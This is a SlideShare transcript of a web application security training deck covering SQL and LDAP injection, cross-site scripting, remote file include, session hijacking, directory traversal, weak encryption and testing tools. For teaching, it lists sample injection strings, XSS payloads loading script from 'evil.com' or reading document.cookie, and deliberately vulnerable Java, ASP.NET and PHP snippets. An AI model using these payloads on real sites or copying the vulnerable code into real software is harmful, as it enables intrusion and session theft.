SlideShare uma empresa Scribd logo

Fundamental Application and Website Security

Transferir como PPTX, PDF
D
Daniel Owens

The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.

TecnologiaNotícias e política
1 de 42
Application and Website Security – Fundamental Edition Daniel Owens IT Security Professional
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Purpose Drum up interest Session Prerequisites None
Communication Media and Security Concerns Communication media: „Wired‟ networks „Wireless‟ networks Security concerns: The Insider The Outsider The Technology Nature
A Note About Security Security helps functionality – if it doesn’t help functionality, it isn’t security. -Daniel Owens
Consequences of Poor Security Stolen intellectual property System downtime Lost productivity Damage to NASA‟s reputation Lost public confidence Lost revenue Congressional inquiries
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
SQL | LDAP Injection SQL and LDAP Injection The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists Example Strings include: 1‟1 %31%27%20%4F%52%20%27%31%27%3D%27%31 &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61& #39&#49 *(|(mail=*))
Java SQL Injection static void main(String[] args){ Connection conn=null; String username=args[0]; String password=args[1]; String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”; conn=DriverManager.getConnection(“jdbc:odbc:l ogistics”,”admin”,”LetMeIn”); Statement stmnt=conn.createStatement(); ResultSet rs=stmnt.executeQuery(query); … }
Demonstration 1 SQL Injection Bypassing Security Checks
Case Study 1 SQL Injection Owning Networks
Cross-Site Scripting (XSS) XSS The injection of client-side code Comes in three kinds: Persistent Non-Persistent DOM Only occurs when user input influences the output Can be stopped by assuming all input is malicious until proven otherwise through a whitelist Can lead to a complete system compromise – for
Cross-Site Scripting (cont.) XSS (cont.) Sample strings: <script src=http://evil.com/attack.js << </script << <link rel=“stylesheet” href=http://evil.com/attack.css> %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E <img src=”” onMouseOver=”alert(document.cookie)”; />
ASP.NET Cross-Site Scripting <%@ Page Language="C#" ValidateRequest="false" %> <html> <script runat="server"> void btnSubmit_Click(Object sender, EventArgs e) { Response.Write(txtString.Text); } </script> // CONTINUED ON NEXT SLIDE
ASP.NET Cross-Site Scripting (cont.) // CONTINUED FROM PREVIOUS SLIDE <body> <form id="form1" runat="server"> <asp:TextBox id="txtString" runat="server" Text="<script>alert(„hi‟);</script>" /> <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" /> </form> </body> </html>
Demonstration 2 XSS Having Fun
Remote File Include/Execution | Code Injection Remote File Include and Execution An attacker tricks the system into including and/or executing arbitrary files Code Injection Attacker tricks the system into executing arbitrary code by injecting the commands into the code Both Code of the attacker‟s choosing is executed Contrary to popular belief, ANY language can suffer this
PHP Remote File Include <?php …. require_once($_GET[„config‟]); require_once($_GET[„base‟].”/index.php”); …. ?>
ASP.NET Remote File Include <% …. set url = Request.QueryString; set xml =Server.CreateObject(“Microsoft.XMLHTTP”); xml.open “GET”, url, false xml.send “” Response.write xml.responseText set xml = nothing …. %>
Hidden Elements | Cookies Hidden Elements and Cookies Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view They do not provide secure storage They are not immutable storage locations Neither should contain sensitive information Both should be considered malicious until proven otherwise Any data in it should not be directly used for output Whitelisting should be used to prove innocence
Hidden Elements | Cookies (cont.) Hidden Elements and Cookies (cont.) &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Log in.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErr orddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_Use r2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Session Hijacking – Cookie Theft Cookie Theft The theft of a client‟s cookies by an attacker Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc Can be hampered if mechanisms such as NONCEs are used NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information Additional mechanisms include using secure cookies, but this has limited impact
Session Hijacking – Session Fixation Session Fixation An attacker uses a „known‟ session ID Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session This is often a phishing or other social engineering attack Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly Difficult to stop if sessions are guessable
Demonstration 3 Session Hijacking Session Fixation
Directory Traversal Directory Traversal An attacker is able to trick the system into traversing the directory structure In many instances, arbitrary files can be viewed Attackers are often attempting to execute a file or gather information If user input dictates the output, care must be taken to ensure the input is „valid‟ Whitelists become invaluable In extreme cases, an attacker can actually use this to gain administrator access to the server
PHP Directory Traversal <?php …. $date=$_GET[„date‟]; if($handle=fopen(“calendar/$date”,”rb”)){ print(fread($handle,filesize(“calendar/$date”))); fclose($handle); } …. ?>
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
Session Hijacking – Spoofing Spoofing Pretending to be someone else, an attacker attempts to gain the victim‟s privileges Comes in three basic forms Blind (write-only) Half pipe (read-only) Full pipe Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
Demonstration 4 Session Hijacking Spoofing
Case Study 2 Session Hijacking Spoofing
Weak Encryption | Using Encoding Weak/Home-Grown Encryption The use of weak and home grown encryption has led to the compromise of many systems It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial Encoding The use of algorithms that take output and simply change the format (normally it is the number of bits used per character) This is not secure by any means
Case Study 3 Weak Encryption | Encoding XOR SHA Base64
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion and Appendices
Security Compass XSS-Me A free Firefox plug-in Performs semi-automated XSS attacks against POST fields SQL Inject-Me A free Firefox plug-in Performs semi-automated SQL injection attacks against POST fields Access-Me A free Firefox plug-in…
Other Firefox Add-ons Web Developer Add-on Free Let‟s you view source files cleanly and easily Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh) Let‟s you view and modify form fields and cookie data Tamper Data Free Let‟s you modify most request data
Fuzzers BED.pl Free Perl script Performs basic tests of your SERVER JBroFuzz Free Java application Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion Powerfuzzer Free and commercial versions (Python script) Easy and multi-talented… automated
Other Tools Sothink SWF Decompiler Decompiles any Adobe Flash or Flux script Cavaj Free Decompiles any Java program Nikto Free Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security SANS Top-20 (IT Professionals) http://www.sans.org/top20/
For More Information (cont.) Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers) http://cwe.mitre.org/top25/index.html GRC IT Security Office http://itsecurity.grc.nasa.gov Most Common Software Errors http://discussweb.com/software-testing/803-most- common-software-errors.html
Acknowledgements I stole the background from Microsoft I stole a lot from my experiences and previous writings

Recomendados

Secure code
Secure codeSecure code
Secure codeddeogun
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 

Recomendados

Secure code
Secure codeSecure code
Secure codeddeogun
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)Anatoliy Okhotnikov
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing ITZairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paperZairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Controlenigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 

Mais conteúdo relacionado

Mais procurados

Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing ITZairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paperZairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Controlenigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 

Mais procurados (20)

Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing IT
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
 
Hack any website
Hack any websiteHack any website
Hack any website
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 

Semelhante a Fundamental Application and Website Security

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
Pci compliance writing secure code
Pci compliance writing secure codePci compliance writing secure code
Pci compliance writing secure codeMiva
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesAlireza Aghamohammadi
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web ApplicationsVladimir Soghoyan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp dotnetcode
 

Semelhante a Fundamental Application and Website Security (20)

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
Pci compliance writing secure code
Pci compliance writing secure codePci compliance writing secure code
Pci compliance writing secure code
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilities
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Attques web
Attques webAttques web
Attques web
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Security Testing For Web Applications
Security Testing For Web ApplicationsSecurity Testing For Web Applications
Security Testing For Web Applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 

Último

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 

Último (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
